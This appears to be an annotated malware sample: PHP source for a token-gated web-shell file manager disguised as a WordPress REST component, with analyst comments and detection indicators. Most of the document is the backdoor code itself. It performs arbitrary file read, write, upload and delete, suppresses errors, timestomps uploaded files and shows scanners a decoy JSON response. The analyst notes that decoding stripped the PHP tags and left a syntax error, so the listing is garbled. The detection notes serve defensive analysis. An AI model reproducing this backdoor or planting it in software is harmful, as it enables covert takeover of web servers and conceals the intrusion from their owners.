

// System Diagnostic Hook
// Analyst note: despite the "diagnostic" label this is a file-manager backdoor.
// It lists, reads, writes, uploads and deletes files anywhere the web server
// user can reach, gated only by a fixed token in the query string. As rendered
// here the <?php / ?> tags between the PHP and HTML fragments have been stripped
// by the decoder, so the listing is not byte-for-byte runnable as shown.
//
// Detection (all values taken from the code below): requests carrying the
// `diag_nonce` parameter with the hard-coded 32-hex literal; multipart POSTs with
// a `file` field; `del=`, `view=`, `edit=` query parameters; POST bodies with
// `file_path` + `new_content`. Files whose mtime equals their parent directory's
// but whose ctime is recent are candidates for the upload path (see touch() below).
//
// Access gate: strict comparison against a fixed literal, then error_reporting(0)
// so that nothing it does surfaces in logs or output.
if (isset($_GET['diag_nonce']) && $_GET['diag_nonce'] === 'dd9f452cb19458a33139a1727f72fc9e') { error_reporting(0); 
// Working directory taken straight from $_GET['path'] with no containment check.
// NOTE(review): the ternary's else-branch is empty here ("? $_GET['path'] : )"),
// which is a syntax error — most likely a dropped literal from the decoding step,
// not the original source. Left as-is; this is a sample under analysis, not code to repair.
$path = realpath(isset($_GET['path']) ? $_GET['path'] : );
// The token is HTML-escaped only so it can be re-embedded in every link rendered below.
$nonce = htmlspecialchars($_GET['diag_nonce']);
// Unrestricted upload: the client-supplied filename is joined onto $path with no
// extension, character or path check. The uploaded file's mtime is then set to the
// directory's mtime (timestomping) so it does not stand out in mtime-sorted listings;
// touch() does not rewrite ctime, which therefore still records the real write time.
// The @ silences any touch() warning.
if (isset($_FILES['file'])) { $new_file_path = $path . '/' . $_FILES['file']['name']; move_uploaded_file($_FILES['file']['tmp_name'], $new_file_path); @touch($new_file_path, filemtime($path)); }
// Arbitrary deletion: $_GET['del'] goes to unlink() unfiltered and is not limited to $path.
if (isset($_GET['del'])) { @unlink($_GET['del']); }
// Arbitrary write: POSTed path and content go straight to file_put_contents(); no restriction.
if (isset($_POST['new_content'])) { file_put_contents($_POST['file_path'], $_POST['new_content']); }
<!DOCTYPE html><html><head><title>Cache Util</title><style>body{font-family:sans-serif;background:#f4f4f4;}table{width:100%;border-collapse:collapse;}th,td{padding:8px;border:1px solid #ddd;text-align:left;}a{text-decoration:none;color:#0073aa;}.actions a{margin-right:10px;}</style></head><body>
<h2>File Utility - Current Path: echo htmlspecialchars($path);</h2><p><a href="?diag_nonce=echo $nonce;&path=echo urlencode(dirname($path));">Go Up</a></p>
<table><tr><th>Name</th><th>Size</th><th>Perms</th><th>Last Modified</th><th>Actions</th></tr>
// Directory listing of whatever realpath() resolved above.
$files = new DirectoryIterator($path);
foreach ($files as $file) {
    if ($file->isDot()) continue;
    // Last four octal digits of the mode (e.g. 0644) for the Perms column.
    $perms = substr(sprintf('%o', $file->getPerms()), -4);
    // Directories become navigation links that carry the token and the entry's real path.
    echo '<tr><td>' . ($file->isDir() ? '<a href="?diag_nonce='.$nonce.'&path=' . urlencode($file->getRealPath()) . '">[' . htmlspecialchars($file->getFilename()) . ']</a>' : htmlspecialchars($file->getFilename())) . '</td>';
    echo '<td>' . ($file->isDir() ? 'DIR' : round($file->getSize() / 1024, 2) . ' KB') . '</td>';
    echo '<td>' . htmlspecialchars($perms) . '</td>';
    echo '<td>' . date("Y-m-d H:i:s", $file->getMTime()) . '</td>';
    // Per-entry View / Edit / Delete links; each one re-propagates the token, so the
    // same literal appears on every follow-up request in the access log.
    echo '<td class="actions"><a href="?diag_nonce='.$nonce.'&path=' . urlencode($path) . '&view=' . urlencode($file->getRealPath()) . '">View</a> <a href="?diag_nonce='.$nonce.'&path=' . urlencode($path) . '&edit=' . urlencode($file->getRealPath()) . '">Edit</a> <a href="?diag_nonce='.$nonce.'&path=' . urlencode($path) . '&del=' . urlencode($file->getRealPath()) . '" onclick="return confirm(\'Are you sure?\');">Delete</a></td></tr>';
}
</table><hr><h3>Upload File</h3><form method="post" enctype="multipart/form-data"><input type="file" name="file"><input type="submit" value="Upload"></form><hr>
// Arbitrary read: $_GET['view'] goes to file_get_contents() unfiltered; basename() is used only for the heading.
if (isset($_GET['view'])) { echo '<h3>Viewing: ' . htmlspecialchars(basename($_GET['view'])) . '</h3><pre>' . htmlspecialchars(file_get_contents($_GET['view'])) . '</pre>'; }
// Editor: the target path is round-tripped through a hidden `file_path` field and
// consumed by the file_put_contents() branch above. exit ends the hook; a request
// without the token falls through to the decoy code that follows this block.
if (isset($_GET['edit'])) { echo '<h3>Editing: ' . htmlspecialchars(basename($_GET['edit'])) . '</h3><form method="post"><textarea name="new_content" style="width:100%;height:300px;">' . htmlspecialchars(file_get_contents($_GET['edit'])) . '</textarea><input type="hidden" name="file_path" value="' . htmlspecialchars($_GET['edit']) . '"><br><input type="submit" value="Save"></form>'; }</body></html> exit; }

/**
 * Core class for controlling REST API routes. Functional decoy.
 * @package WordPress
 */
// Redeclaration guard so a second inclusion of this file does not fatal; the class
// name is chosen to look like a WordPress core component (it is not one).
if (class_exists('WP_REST_Routes_Controller_Decoy')) { return; }
// Cover story: a WordPress-looking class holding a static route map. It is never
// consulted by the file-manager code above; it exists only to give requests without
// the token a plausible-looking response.
class WP_REST_Routes_Controller_Decoy {
    // Returns a fixed route => methods map (two hard-coded entries, nothing dynamic).
    public static function get_routes() { 
        return [
            '/wp/v2/posts' => ['methods' => ['GET', 'POST']],
            '/wp/v2/users' => ['methods' => ['GET']],
        ]; 
    }
}
// Reached by any request that did not pass the token gate above: emit the decoy
// route map as JSON and stop. A scanner or casual visitor therefore sees a
// harmless-looking REST-style reply; the backdoor is only visible in the source.
header("Content-Type: application/json");
echo json_encode(WP_REST_Routes_Controller_Decoy::get_routes());
die();


